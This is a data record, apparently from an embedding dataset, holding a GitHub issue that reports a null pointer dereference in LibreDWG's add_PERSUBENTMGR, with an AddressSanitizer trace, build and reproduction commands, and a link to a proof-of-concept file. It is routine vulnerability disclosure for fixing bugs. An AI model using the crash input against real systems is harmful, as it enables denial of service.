-0.011259064078330994, 0.009935717098414898, 0.013665148988366127, 0.012341802008450031, 0.014075598679482937, -0.007296099793165922, 0.010742463171482086, -0.013113164342939854, 0.006510583683848381, -0.0065070451237261295, 0.003007606603205204, -0.02554696425795555, -0.013934064656496048, -0.013997755013406277, -0.024584529921412468, -0.04002593457698822, -0.018824078142642975, 0.01205165684223175, 0.015243258327245712, -0.010317860171198845, 0.008315147832036018, -0.01774841733276844, 0.002988145686686039, 0.009794182144105434, 0.005137699656188488, 0.0020823252853006124, -0.007763163186609745, -0.000852302648127079, -0.024075007066130638, -0.020253576338291168, 0.0035454374738037586, -0.01258241105824709, -0.022532280534505844, 0.002988145686686039, 0.01892315223813057, 0.027061382308602333, -0.017507808282971382, 0.00701303081586957, 0.012511643581092358, -0.018541010096669197, 0.00813115295022726, -0.016870904713869095, 0.006425662897527218, 0.020862175151705742, 0.01623399928212166, 0.02309841848909855, -0.0008806094992905855, -0.007876390591263771, 0.018498549237847328, 0.011343983933329582, -0.026778314262628555, -0.010657542385160923, -0.002690923400223255, -0.002616617828607559, -0.016120770946145058, -0.002881994703784585, -0.008492065593600273, 0.003265906823799014, -0.006323050707578659, 0.00012152057752246037, -0.0011941967532038689, -0.003004068275913596, 0.0020044813863933086, -0.014167596586048603, -0.009468653239309788, -0.005923215765506029, -0.011775664053857327, -0.003885120153427124, -0.0036905102897435427, 0.021711381152272224, -0.010813230648636818, -0.008668983355164528, -0.01314854808151722, 0.01572447456419468, 0.0072890231385827065, -0.008895439095795155, -0.006549505516886711, 0.02496667392551899, -0.020961249247193336, 0.0031402951572090387, 0.008138229139149189, 0.021032016724348068, 0.017253046855330467, 0.019715745002031326, -0.009985254146158695, 0.004458334296941757, -0.027556752786040306, 0.006857343018054962, -0.014139289036393166, 0.012759328819811344, -0.005378308240324259, -0.012094116769731045, -0.010508931241929531, 0.0000396406976506114, 0.008039155043661594, 0.0004254878731444478, 0.0003620185307227075, -0.008223149925470352, -0.00846375897526741, -0.010063097812235355, 0.0011092760832980275, 0.009298811666667461, -0.002367163309827447, 0.01685675047338009, -0.027174610644578934, 0.014344514347612858, 0.00838591530919075, 0.0013428078964352608, -0.004221264272928238, 0.00146488135214895, 0.007621629163622856, -0.019942201673984528, 0.0027935358230024576, 0.013842066749930382, -0.002420238684862852, -0.007763163186609745, 0.026792466640472412, 0.0019496367312967777, -0.014790347777307034, 0.0067759607918560505, -0.0042071109637618065, 0.005668453872203827, 0.013771300204098225, 0.02118770405650139, -0.0015674937749281526, -0.01634722575545311, -0.010211708955466747, -0.004051423165947199, -0.013403310440480709, 0.02176799438893795, 0.006691040005534887, -0.020097889006137848, -0.035638369619846344, 0.001686913426965475, 0.021555693820118904, 0.00649643037468195, 0.017422888427972794, 0.008145306259393692, -0.019843127578496933, -0.03912011533975601, -0.016248151659965515, -0.011209527030587196, -0.003980655688792467, -0.007193487137556076, 0.014634659513831139, -0.006510583683848381, -0.0022468590177595615, 0.001965559320524335, -0.008775134570896626, -0.002091171219944954, 0.0020062504336237907, 0.014033138751983643, -0.01739458180963993, 0.002144246594980359, 0.011110452935099602, 0.011881815269589424, 0.015979235991835594, 0.007770240306854248, -0.021173549816012383, 0.01579524204134941, -0.003637434681877494, -0.020494185388088226, 0.018314555287361145, -0.016134925186634064, 0.006323050707578659, 0.0060293665155768394, 0.0003385768795851618, -0.008237303234636784, -0.012808865867555141, 0.004960781894624233, -0.0016417993465438485, 0.003028836799785495, 0.01583770290017128, 0.010777846910059452, -0.003104911418631673, -0.009029896929860115, 0.020692333579063416, -0.006970570422708988, 0.021867068484425545, 0.018130559474229813, -0.014733733609318733, 0.005962137598544359, 0.001924868207424879, 0.007465940900146961, 0.016899211332201958, -0.013099011033773422, 0.000024174190912162885, 0.016559528186917305, -0.00887420866638422, -0.003280060365796089, 0.0202111154794693, -0.007572092115879059, 0.023749476298689842, -0.004249571356922388, 0.006634426303207874, -0.0032216773834079504, -0.004592792131006718, 0.0014754964504390955, 0.0066627333872020245, -0.015894316136837006, -0.003318982431665063, -0.03844074904918671, 0.016432147473096848, -0.0034976694732904434, 0.004490179941058159, -0.01098307128995657, 0.008725597523152828, -0.0005121777066960931, -0.009978177025914192, 0.0033313666936010122, 0.0032765220385044813, -0.014931881800293922, 0.016842596232891083, 0.012469182722270489, 0.02754260040819645, -0.003117295680567622, 0.007494247984141111, -0.0050209336914122105, -0.0019460984040051699, -0.0023247029166668653, 0.0015657246112823486, 0.011400598101317883, -0.03413810580968857, -0.002766998019069433, 0.006839651148766279, -0.0010163941187784076, 0.004171727225184441, 0.0013658072566613555, -0.004306185059249401, -0.00239016255363822, 0.0023034727200865746, -0.011131682433187962, 0.011789818294346333, -0.00524738896638155, 0.008506218902766705, 0.0034021337050944567, -0.01790410466492176, 0.009171430952847004, 0.031024346128106117, -0.024273155257105827, 0.0008668983937241137, 0.0036905102897435427, 0.004918321501463652, -0.01783333718776703, -0.011648283340036869, 0.0043769520707428455, 0.014946036040782928, -0.0014984958106651902, 0.023551328107714653, 0.007657012436538935, -0.005042164120823145, -0.02340979501605034, 0.011244909837841988, 0.00967387855052948, 0.007947158068418503, 0.0065884278155863285, -0.021244317293167114, 0.025886647403240204, 0.010898150503635406, -0.0005661377217620611, -0.006885650102049112, 0.004083268344402313, -0.008223149925470352, 0.005112931132316589, 0.015384792350232601, 0.0003427786868996918, -0.0009872026275843382, 0.00895205233246088, -0.024711910635232925, -0.019800666719675064, -0.014464818872511387, -0.01191719900816679, -0.025490351021289825, 0.008640676736831665, 0.011513825505971909, 0.012370108626782894, 0.01390575710684061, -0.0027899974957108498, 0.006867958232760429, 0.008775134570896626, -0.01716812700033188, -0.010671695694327354, 0.0015843010041862726, 0.005304002668708563, 0.0024821599945425987, 0.00022590221487917006, 0.019092993810772896, -0.0016108386917039752, 0.011775664053857327, -0.01158459298312664, 0.01970159262418747, 0.021867068484425545, -0.018073946237564087, -0.0009111278923228383, 0.02867487445473671, 0.04022408276796341, 0.016375532373785973, -0.003906350117176771, 0.0202111154794693, -0.0005285426159389317, -0.003518899669870734, -0.0038355831056833267, -0.008647753857076168, 0.004851092584431171, 0.005201390013098717, -0.016276458278298378, 0.010056020691990852, 0.0028200733941048384, 0.008711444213986397, 0.0024432381615042686, 0.03343043103814125, 0.00613551726564765, 0.017366275191307068, -0.011796894483268261, -0.009447422809898853, 0.006942263804376125, -0.02418823353946209, -0.008081615902483463, -0.0247685257345438, -0.014464818872511387, -0.0203243438154459, 0.029071170836687088, 0.009228045120835304, 0.016517067328095436, 0.008534526452422142, -0.01084861345589161, -0.006599042564630508, 0.013955294154584408, 0.019885586574673653, 0.00014451991592068225, 0.015413098968565464, -0.0014339206973090768, 0.010777846910059452, 0.03518546000123024, 0.0060930573381483555, 0.01314854808151722, 0.003242907579988241, 0.0031809862703084946, -0.007168718613684177, -0.007193487137556076, 0.0069068800657987595, -0.004313261713832617, -0.0004860823100898415, 0.0033331357408314943, -0.00613551726564765, -0.0007421711343340576, -0.013849143870174885, -0.0032729837112128735, 0.0006280590314418077, 0.023310720920562744, 0.01817302033305168, 0.002881994703784585, -0.005406615324318409, -0.022263364866375923, 0.01408267579972744, 0.003906350117176771, -0.015158337540924549, 0.004851092584431171, -0.012922093272209167, 0.02278704196214676, -0.004178803879767656, -0.0020062504336237907, -0.0032906753476709127, -0.008690213784575462, -0.00825145747512579, 0.01646045409142971, 0.004564485512673855, 0.008881285786628723, -0.012341802008450031, -0.021640613675117493, 0.010926458053290844, -0.022461513057351112, -0.012094116769731045, 0.014988495968282223, 0.0005745413363911211, 0.017465349286794662, -0.03634604066610336, -0.020041275769472122, -0.01641799323260784, 0.008690213784575462, 0.010537237860262394, -0.0006563658826053143, 0.002241551410406828, -0.017224740236997604, -0.010261246003210545, -0.019135454669594765, -0.009489883668720722, 0.003304828889667988, 0.003175678662955761, 0.007211179006844759, -0.027995510026812553, 0.030599743127822876, 0.016219845041632652, 0.0008611485245637596, 0.006977647077292204, -0.00395942572504282, -0.015866009518504143, 0.014804501086473465, -0.008640676736831665, 0.031137574464082718, 0.0012605410302057862, -0.01062923576682806, -0.011619976721704006, 0.0018072177190333605, -0.014231286942958832, -0.004886476323008537, -0.008293917402625084, -0.003920503426343203, 0.001375537714920938, -0.005799373146146536, 0.009192661382257938, 0.00701303081586957, -0.005771066062152386, 0.010820306837558746, 0.010997224599123001, -0.01205165684223175, -0.005594148300588131, -0.005307541228830814, 0.0034923620987683535, -0.0009748183656483889, 0.004971396643668413, -0.01098307128995657, -0.007062567863613367, 0.002039864892140031, -0.008477912284433842, 0.0030659895855933428, 0.0014153443044051528, -0.004790940321981907, 0.006995338946580887, 0.021357545629143715, 0.002620156155899167, -0.005130623001605272, -0.00242377701215446, 0.0016621449030935764, 0.016630295664072037, -0.0016586065758019686, -0.0167718306183815, -0.00895205233246088, -0.02227751910686493, 0.009518190287053585, -0.024881752207875252, -0.005296926014125347, -0.012653177604079247, -0.012214421294629574, 0.004384028725326061, 0.012002119794487953, -0.030571436509490013, 0.02554696425795555, 0.01568201370537281, -0.01098307128995657, 0.019644979387521744, -0.002441468881443143, 0.01260364055633545, -0.024711910635232925, -0.019871434196829796, 0.006499968469142914, -0.00873975083231926, 0.0004168631276115775, 0.014662967063486576, 0.00027400179533287883, 0.003927580546587706, 0.0019531750585883856, -0.01892315223813057, 0.016941670328378677, 0.011591669172048569, -0.02570265159010887, -0.010303705930709839, -0.03912011533975601, -0.01958836428821087, -0.00315444846637547, -0.01579524204134941, -0.019064687192440033, 0.0023317798040807247, -0.013346696272492409, 0.0012348878663033247, -0.007430557627230883, -0.003242907579988241, 0.006022289860993624, 0.0234381016343832, 0.0009518190054222941, 0.007069644518196583, -0.005123546347022057, -0.000031071231205714867, -0.004854630678892136, 0.05047117546200752, 0.008973282761871815, -0.0005674646236002445, 0.0063761258497834206, -0.005268618930131197, 0.007090874947607517, 0.009178508073091507, -0.024315614253282547, -0.0062805903144180775, -0.008477912284433842, -0.008732674643397331, 0.008414221927523613, 0.00948280654847622, -0.010813230648636818, -0.004553870297968388, -0.0023140879347920418, 0.008392991498112679, -0.0042637246660888195, -0.005969214718788862, -0.02500913292169571, -0.007122720126062632, -0.0016895672306418419, 0.002296396065503359, -0.012907939963042736, -0.020027121528983116, 0.0042071109637618065, -0.010728309862315655, -0.020550798624753952, -0.003948810510337353, 0.003412748919799924, 0.020494185388088226, -0.01131567731499672, -0.012398416176438332, 0.004221264272928238, 0.0014604583848267794, 0.013898680917918682, 0.008959129452705383, 0.01614907756447792, -0.014931881800293922, -0.01041693426668644, -0.011853508651256561, -0.006892726756632328, 0.0025582348462194204, 0.014691273681819439, -0.020041275769472122, 0.036062970757484436, -0.008032078854739666, 0.033798422664403915, 0.016007544472813606, 0.017111511901021004, 0.00271038431674242, 0.00907235685735941, 0.013304236344993114, 0.001430382253602147, 0.020225269719958305, 0.00673703895881772, 0.0037152788136154413, -0.007770240306854248, -0.02052249200642109, -0.006917495280504227, 0.014139289036393166, 0.006082442123442888, -0.012087040580809116, -0.01790410466492176, -0.019008073955774307, -0.01786164566874504, 0.02918439917266369, 0.017960719764232635, -0.004858169239014387, 0.034817468374967575, -0.012497490271925926, 0.0057852198369801044, 0.0056472234427928925, -0.015130029991269112, 0.0034782085567712784, -0.026424476876854897, 0.0014799194177612662, -0.006556582171469927, 0.014988495968282223, -0.012079963460564613, -0.014422358013689518, -0.02094709500670433, 0.003410979639738798, 0.008456681855022907, 0.012412569485604763, 0.004755556583404541, -0.005668453872203827, -0.0009314734488725662, -0.002747537102550268, -0.01595092937350273, 0.009185584262013435, 0.0006373472278937697, -0.011188296601176262, -0.028108736500144005, 0.024910058826208115, -0.01220734417438507, 0.010183402337133884, 0.003446363378316164, -0.004444180987775326, 0.011301524005830288, 0.023607943207025528, 0.0008965321467258036, -0.026353711262345314, -0.0026555396616458893, -0.0015117645962163806, -0.01630476675927639, 0.014316207729279995, -0.011075069196522236, -0.02250397391617298, 0.007812700234353542, 0.0021796301007270813, -0.013049473986029625, -0.02258889377117157, 0.001083622919395566, 0.009836643002927303, 0.008732674643397331, 0.010537237860262394, -0.01770595647394657, 0.016488760709762573, 0.009192661382257938, -0.029042864218354225, 0.0016568374121561646, 0.008881285786628723, -0.007281946483999491, -0.01770595647394657, -0.0002357432822464034, 0.016559528186917305, 0.007614552043378353, 0.010501854121685028, -0.023070111870765686, 0.010799076408147812, -0.01634722575545311, 0.008300994522869587, 0.018130559474229813, 0.009164353832602501, 0.006301820278167725, 0.0017541423439979553, 0.005091701168566942, 0.012122423388063908, 0.012285188771784306, 0.006924571935087442, 0.020423417910933495, -0.005056317429989576, -0.007437634281814098, -0.040903449058532715, 0.00969510804861784, 0.0010906996903941035, -0.015809396281838417, -0.01096184179186821, -0.004787402227520943, -0.0004931589937768877, 0.0015011494979262352, 0.007030722685158253, -0.005279234144836664, 0.004313261713832617, 0.017847491428256035, -0.0035861285869032145, 0.02457037754356861, -0.006312435492873192, 0.025914954021573067, -0.005703837610781193, 0.021286778151988983, 0.006591965910047293, -0.028660722076892853, 0.014394051395356655, -0.0018098715227097273, 0.023579636588692665, -0.009525267407298088, 0.005870140623301268, -0.0029439160134643316, -0.017932411283254623, -0.0055799949914216995, 0.005813526455312967, -0.006549505516886711, 0.014549738727509975, 0.007876390591263771, 0.007373943459242582, 0.01837116852402687, 0.016092464327812195, 0.011244909837841988, 0.0043380302377045155, 0.01896561309695244, -0.002919147489592433, 0.00021230164566077292, 0.016446299850940704, 0.0001739325380185619, 0.003941733855754137, -0.011683667078614235, 0.02309841848909855, -0.008003772236406803, 0.0011243141489103436, -0.007833930663764477, 0.001210119342431426, 0.004978473298251629, -0.0071581038646399975, 0.027358604595065117, 0.005926754325628281, -0.00474140327423811, 0.018597623333334923, -0.002804150804877281, 0.02137169800698757, -0.01279471255838871, 0.0050209336914122105, -0.0086052929982543 ]
2,261
null
null
null
null
null
null
null
null
null
[ "LibreDWG", "libredwg" ]
## Affected version the latest commit: https://github.com/LibreDWG/libredwg/tree/45d2a290c65ed691be0901ba2b2ef51044e07a16 and 0.12.4 ## What's the problem? A null pointer deference was discovered in function add_PERSUBENTMGR in in_dxf.c. ASAN report: ``` ==522252==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x000001ad2631 bp 0x7fffffffbcd0 sp 0x7fffffffbc70 T0) ==522252==The signal is caused by a READ memory access. ==522252==Hint: address points to the zero page. #0 0x1ad2631 in add_PERSUBENTMGR /src/libredwg/src/in_dxf.c:6123:26 #1 0x1a8b6e9 in new_object /src/libredwg/src/in_dxf.c:9307:26 #2 0x1a78816 in dxf_objects_read /src/libredwg/src/in_dxf.c:12301:22 #3 0x1a6d0f9 in dwg_read_dxf /src/libredwg/src/in_dxf.c:12838:23 #4 0x4cb82a in dxf_read_file /src/libredwg/src/dwg.c:381:13 #5 0x4c91c4 in main /src/libredwg/programs/dxf2dwg.c:312:15 #6 0x7ffff7c580b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 #7 0x41c40d in _start (/mnt/disk/out/libredwg/programs_asan/dxf2dwg+0x41c40d) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /src/libredwg/src/in_dxf.c:6123:26 in add_PERSUBENTMGR ==522252==ABORTING ``` ## Compile command ``` CC="clang" CFLAGS="-O1 -g -fsanitize=address" ./configure --enable-release --disable-shared && make ``` ## How can we reproduce the issue? ``` unzip tests_64262.zip dxf2dwg ./tests_64262 -o /dev/null ``` POC file : [tests_64262.zip](https://github.com/LibreDWG/libredwg/files/6635622/tests_64262.zip)
Null pointer dereference in function add_PERSUBENTMGR in in_dxf.c
https://api.github.com/repos/LibreDWG/libredwg/issues/376/comments
0
2021-06-11T03:40:45
2021-06-27T06:36:32Z
https://github.com/LibreDWG/libredwg/issues/376
918,178,282
376
false
This is a GitHub Issue repo:libredwg owner:LibreDWG Title : Null pointer dereference in function add_PERSUBENTMGR in in_dxf.c Issue date: --- start body --- ## Affected version the latest commit: https://github.com/LibreDWG/libredwg/tree/45d2a290c65ed691be0901ba2b2ef51044e07a16 and 0.12.4 ## What's the problem? A null pointer deference was discovered in function add_PERSUBENTMGR in in_dxf.c. ASAN report: ``` ==522252==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x000001ad2631 bp 0x7fffffffbcd0 sp 0x7fffffffbc70 T0) ==522252==The signal is caused by a READ memory access. ==522252==Hint: address points to the zero page. #0 0x1ad2631 in add_PERSUBENTMGR /src/libredwg/src/in_dxf.c:6123:26 #1 0x1a8b6e9 in new_object /src/libredwg/src/in_dxf.c:9307:26 #2 0x1a78816 in dxf_objects_read /src/libredwg/src/in_dxf.c:12301:22 #3 0x1a6d0f9 in dwg_read_dxf /src/libredwg/src/in_dxf.c:12838:23 #4 0x4cb82a in dxf_read_file /src/libredwg/src/dwg.c:381:13 #5 0x4c91c4 in main /src/libredwg/programs/dxf2dwg.c:312:15 #6 0x7ffff7c580b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 #7 0x41c40d in _start (/mnt/disk/out/libredwg/programs_asan/dxf2dwg+0x41c40d) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /src/libredwg/src/in_dxf.c:6123:26 in add_PERSUBENTMGR ==522252==ABORTING ``` ## Compile command ``` CC="clang" CFLAGS="-O1 -g -fsanitize=address" ./configure --enable-release --disable-shared && make ``` ## How can we reproduce the issue? ``` unzip tests_64262.zip dxf2dwg ./tests_64262 -o /dev/null ``` POC file : [tests_64262.zip](https://github.com/LibreDWG/libredwg/files/6635622/tests_64262.zip) --- end body ---
1,805
[ -0.005115125793963671, 0.036701750010252, 0.003061489434912801, 0.0055811223573982716, 0.06305765360593796, 0.030979745090007782, -0.017050419002771378, 0.04404209926724434, -0.016515787690877914, 0.004551595076918602, -0.039273764938116074, 0.00658897589892149, 0.013387469574809074, -0.00846018735319376, -0.0045082466676831245, 0.026659343391656876, -0.02940474823117256, 0.021963251754641533, -0.01225318294018507, -0.01130674034357071, 0.03412973880767822, -0.002308308845385909, -0.0022505109664052725, 0.03577698394656181, -0.0007838858291506767, 0.001344707328826189, -0.011718550696969032, -0.0029874357860535383, 0.0027273446321487427, 0.002543113427236676, -0.012202609330415726, 0.00586288794875145, 0.01772954687476158, 0.012274857610464096, 0.052451714873313904, 0.013322446495294571, 0.036065973341464996, 0.037077438086271286, 0.014825195074081421, 0.04222146421670914, -0.022570131346583366, -0.05496592819690704, -0.015894459560513496, -0.00597848417237401, -0.01187027059495449, 0.013112928718328476, 0.02014261484146118, 0.01242657657712698, -0.040343027561903, 0.04837695509195328, 0.002120465273037553, -0.009478877298533916, -0.0040061259642243385, -0.0645604059100151, 0.0028284911531955004, -0.02219444513320923, 0.020778393372893333, 0.043753109872341156, -0.019535735249519348, 0.020301558077335358, -0.00754264323040843, 0.033725153654813766, 0.00464912923052907, 0.013019006699323654, -0.005714780651032925, 0.025604529306292534, -0.031904514878988266, 0.003774933982640505, -0.019073350355029106, -0.013690909370779991, 0.0000228031294682296, -0.0274107176810503, -0.0018585679354146123, 0.03184671700000763, 0.041412290185689926, -0.03401414304971695, 0.01197141781449318, 0.02719397470355034, -0.007766610477119684, 0.00483336066827178, -0.009724519215524197, 0.02174651063978672, -0.006675672717392445, 0.00410004798322916, -0.0076943631283938885, -0.0037460350431501865, 0.0018314751796424389, -0.06941543519496918, -0.01076488383114338, -0.026052463799715042, -0.0006041700835339725, 0.02093733660876751, 0.016703631728887558, -0.012491599656641483, 0.02778640389442444, -0.027063928544521332, -0.02426072396337986, -0.0005395988118834794, -0.04265494644641876, -0.02069169655442238, -0.04982190579175949, -0.008965919725596905, 0.0014151487266644835, 0.03930266201496124, 0.029650390148162842, 0.02083619125187397, 0.01943458802998066, -0.0015379695687443018, 0.010389196686446667, 0.13894647359848022, -0.007148894015699625, -0.01975247822701931, -0.03233800083398819, 0.012867286801338196, 0.015273130498826504, 0.010237476788461208, 0.01765729859471321, -0.008503535762429237, -0.025850169360637665, -0.03152882680296898, -0.04464897885918617, -0.039909541606903076, -0.010468668304383755, -0.006079630460590124, -0.012556622736155987, 0.02489650249481201, -0.009673945605754852, 0.0003802026913035661, -0.051122359931468964, 0.015128634870052338, -0.021515317261219025, -0.04736548662185669, 0.021313024684786797, -0.005675044376403093, 0.011191143654286861, 0.02157311514019966, -0.04563154652714729, 0.02657264471054077, 0.01957908272743225, -0.00037659029476344585, -0.078316330909729, -0.045111365616321564, 0.01618344895541668, -0.02803204581141472, -0.03872468322515488, -0.0031734732910990715, -0.009197112172842026, -0.007513744290918112, 0.007874981500208378, -0.04173018038272858, -0.015013039112091064, 0.0005007657455280423, 0.018206380307674408, 0.014182192273437977, 0.0493595190346241, 0.006704571656882763, 0.00506094004958868, 0.026168059557676315, -0.02541668526828289, 0.006383070256561041, 0.031124239787459373, -0.008185646496713161, 0.0023191459476947784, -0.040343027561903, -0.04022743180394173, 0.00754986796528101, 0.00007659367838641629, 0.011277841404080391, -0.02492540143430233, 0.02733846940100193, -0.013069580309092999, -0.015721064060926437, 0.017498353496193886, 0.00954390037804842, -0.055428314954042435, -0.0007635661750100553, -0.013120152987539768, 0.021732060238718987, -0.01426166482269764, -0.02849443070590496, -0.00048676779260858893, 0.0005364380194805562, -0.015273130498826504, -0.009059841744601727, 0.01254939753562212, -0.034736618399620056, 0.033262766897678375, -0.042279262095689774, -0.01684812642633915, 0.005064552649855614, -0.027743056416511536, -0.011299515143036842, 0.003211403265595436, -0.0022234180942177773, 0.014203866943717003, -0.004732213914394379, -0.04051642119884491, -0.00013512547593563795, -0.012188159860670567, -0.021732060238718987, 0.0028068169485777617, 0.021443070843815804, 0.0078316330909729, 0.025156592950224876, 0.011422336101531982, 0.007636565249413252, -0.03421643376350403, 0.05230721831321716, 0.003054264700040221, -0.023928385227918625, 0.00034430468804202974, -0.02251233346760273, 0.006567301694303751, 0.011126121506094933, -0.015778863802552223, 0.021934352815151215, -0.009753418155014515, -0.005389666650444269, -0.023538248613476753, -0.0026334228459745646, 0.02324925921857357, -0.018350875005126, 0.00959447305649519, 0.0032005661632865667, -0.04823245853185654, -0.004056699573993683, 0.018871057778596878, 0.00837348960340023, -0.042943939566612244, 0.007513744290918112, 0.03502560779452324, -0.016689181327819824, 0.010728759691119194, 0.004822523333132267, 0.021038483828306198, 0.006018219981342554, 0.007773835211992264, -0.012650544755160809, -0.025373335927724838, -0.01347416639328003, 0.007622115779668093, 0.017382757738232613, -0.012202609330415726, -0.02244008705019951, 0.020532751455903053, 0.041412290185689926, -0.02684718556702137, -0.004898383282124996, 0.024419669061899185, 0.0027472127694636583, 0.004652741830796003, -0.0033035187516361475, 0.014182192273437977, -0.00942107941955328, 0.017368309199810028, -0.016053402796387672, 0.01485409401357174, 0.010100206360220909, -0.040921006351709366, -0.004244543146342039, 0.03618156909942627, -0.0114512350410223, -0.01978137716650963, 0.014579554088413715, -0.010273599997162819, -0.0021403334103524685, -0.033262766897678375, -0.006975499913096428, 0.013640335761010647, 0.0021186592057347298, 0.027107277885079384, -0.03161552548408508, -0.004555207677185535, -0.04305953532457352, -0.01667473278939724, -0.01437003631144762, 0.009023717604577541, -0.011104446835815907, 0.011754674836993217, -0.013965449295938015, -0.0012598164612427354, 0.0011053873458877206, -0.020373806357383728, 0.00958002358675003, 0.05216272547841072, -0.021789858117699623, 0.01291786041110754, -0.003771321615204215, -0.010114655829966068, -0.007564317435026169, -0.001200212282128632, 0.012455476447939873, -0.04768337681889534, -0.001271556713618338, 0.006083243060857058, 0.022627929225564003, 0.0014097301755100489, -0.01916004717350006, -0.029274703934788704, -0.010215802118182182, 0.019709128886461258, -0.0071525066159665585, 0.00010436383308842778, 0.003865243401378393, -0.01291786041110754, 0.015749963000416756, -0.017541702836751938, -0.006155490409582853, -0.01817748136818409, -0.007990578189492226, 0.053607676178216934, -0.04305953532457352, -0.006303597707301378, -0.014305013231933117, -0.013806505128741264, -0.0306907556951046, 0.0029838234186172485, -0.0385223887860775, 0.01772954687476158, 0.016703631728887558, -0.03950495645403862, 0.010129105299711227, -0.03644166141748428, -0.024665310978889465, 0.041238896548748016, -0.034592121839523315, -0.02027265913784504, 0.06849066913127899, -0.05817371979355812, 0.021659811958670616, 0.011733001098036766, -0.021732060238718987, -0.012751691043376923, -0.015041938051581383, -0.02495430037379265, -0.030083876103162766, 0.005082614719867706, -0.0027454064693301916, -0.0028230727184563875, -0.008438512682914734, -0.014608453027904034, 0.010309724137187004, -0.011133345775306225, -0.02628365531563759, -0.006097692530602217, 0.010027959011495113, 0.032771483063697815, -0.012874512001872063, -0.010584264993667603, 0.01242657657712698, 0.0008728405809961259, 0.03346506133675575, -0.0007730486686341465, -0.00296214921399951, 0.007116382941603661, 0.00779550988227129, -0.0017700647003948689, -0.01470237411558628, -0.003933878615498543, -0.009486102499067783, 0.040603116154670715, -0.02411622926592827, 0.016689181327819824, 0.010533691383898258, -0.011740225367248058, 0.03499670699238777, 0.015706615522503853, -0.00820009596645832, -0.0223100408911705, -0.002562981564551592, -0.032395798712968826, 0.036094870418310165, -0.002004869282245636, -0.039244864135980606, 0.00035988306626677513, -0.022700177505612373, 0.02702058106660843, 0.05768243595957756, -0.02926025353372097, 0.0027490188367664814, -0.003025365760549903, -0.0023299832828342915, -0.008286792784929276, -0.034765515476465225, 0.06149710714817047, 0.025503382086753845, -0.026052463799715042, 0.0723053365945816, -0.01573551446199417, -0.036239366978406906, -0.022324489429593086, 0.04586273804306984, -0.026876084506511688, -0.04080541059374809, 0.00807727500796318, 0.03938936069607735, 0.014969690702855587, 0.020503852516412735, 0.03629716485738754, -0.0349678099155426, 0.0008913540514186025, 0.013329671695828438, 0.0036792061291635036, 0.0007590507157146931, 0.015677716583013535, 0.022468985989689827, 0.037568721920251846, -0.014427834190428257, 0.014724048785865307, 0.0005937844980508089, 0.004985080100595951, -0.020503852516412735, -0.052451714873313904, -0.008785300888121128, 0.04100770503282547, 0.03268478810787201, -0.011133345775306225, 0.0033342239912599325, -0.0825933888554573, 0.015706615522503853, 0.0016987202689051628, -0.017108216881752014, 0.0033522858284413815, 0.017035970464348793, 0.023335956037044525, 0.007853307761251926, -0.03655725717544556, 0.022888021543622017, 0.06513838469982147, -0.0223100408911705, -0.011798023246228695, 0.029765985906124115, 0.009601698257029057, 0.026587095111608505, -0.016038954257965088, -0.0020084816496819258, -0.014377260580658913, -0.04930172115564346, 0.006794881075620651, 0.007860532030463219, -0.007961679250001907, 0.015273130498826504, -0.020879538729786873, -0.006224125623703003, 0.03866688534617424, -0.05097786337137222, -0.031066441908478737, -0.009319933131337166, 0.013503065332770348, -0.03580588102340698, -0.016963722184300423, 0.0037640968803316355, 0.020532751455903053, 0.0023624945897608995, -0.0001832152483984828, -0.010092981159687042, 0.006603425368666649, -0.0033613168634474277, 0.005064552649855614, -0.00006807073077652603, -0.0036177956499159336, 0.017570601776242256, -0.04080541059374809, -0.02453526481986046, -0.000939218036364764, 0.06247967481613159, 0.02202104963362217, -0.016732530668377876, -0.007300613913685083, -0.010620388202369213, -0.001957908272743225, 0.01908780075609684, -0.0025358886923640966, 0.00326017034240067, 0.0022776038385927677, 0.04028522968292236, -0.027800854295492172, -0.003404665272682905, -0.01142956130206585, -0.02699168212711811, 0.006538402289152145, -0.006751532666385174, -0.013669234700500965, -0.0028772582300007343, 0.009370505809783936, 0.015013039112091064, 0.015851110219955444, 0.01226763240993023, -0.04155678674578667, 0.014969690702855587, 0.03652835637331009, 0.045255858451128006, -0.03829119727015495, -0.06132371351122856, -0.014752947725355625, 0.011581281200051308, -0.00929825846105814, -0.003513036761432886, 0.05586179718375206, 0.013690909370779991, 0.029737086966633797, -0.01674697920680046, 0.050255388021469116, -0.029202455654740334, 0.019954770803451538, -0.017382757738232613, -0.03748202323913574, 0.01573551446199417, -0.016111202538013458, -0.025980215519666672, 0.010519241914153099, -0.025994665920734406, -0.00229024700820446, -0.03164442256093025, 0.006704571656882763, -0.010981625877320766, 0.012737241573631763, 0.007470395881682634, 0.01466625090688467, 0.00006897382263559848, -0.015417625196278095, -0.031904514878988266, -0.007961679250001907, 0.026962781324982643, -0.01731051132082939, 0.023682743310928345, 0.0076437899842858315, -0.0006335205980576575, 0.013885977678000927, -0.03086414933204651, 0.009587248787283897, 0.005588347092270851, -0.01080100703984499, 0.039736147969961166, -0.024072879925370216, -0.0011297708842903376, -0.005451077129691839, 0.01768619753420353, 0.008033926598727703, -0.009977385401725769, 0.019318992272019386, 0.06918424367904663, -0.026688242331147194, -0.009363281540572643, -0.009803990833461285, 0.029419198632240295, -0.02384168840944767, 0.003991676494479179, -0.00898759439587593, -0.014644576236605644, -0.007528193760663271, -0.012289307080209255, -0.01664583384990692, -0.0013519320636987686, 0.0021927128545939922, 0.009753418155014515, -0.04187467321753502, 0.008019477128982544, 0.024491915479302406, 0.015273130498826504, 0.027396267279982567, -0.012217058800160885, 0.013885977678000927, -0.023437101393938065, 0.00018592452397570014, -0.0038796928711235523, 0.008799750357866287, 0.028407733887434006, -0.021789858117699623, -0.0034913623239845037, 0.019810276105999947, 0.0025087958201766014, 0.022526783868670464, -0.007134444545954466, -0.012318206019699574, 0.0019470711704343557, -0.02027265913784504, -0.00044816051376983523, -0.013943775556981564, -0.04803016409277916, 0.022382287308573723, -0.017180465161800385, -0.0021222715731710196, 0.018610967323184013, 0.01317795179784298, -0.019145598635077477, -0.003323386888951063, -0.016761429607868195, 0.0318756140768528, -0.01723826304078102, 0.0017628399655222893, 0.006863516289740801, 0.04196137189865112, 0.01036752201616764, -0.012419352307915688, 0.002963955281302333, 0.010143554769456387, -0.0039844517596066, 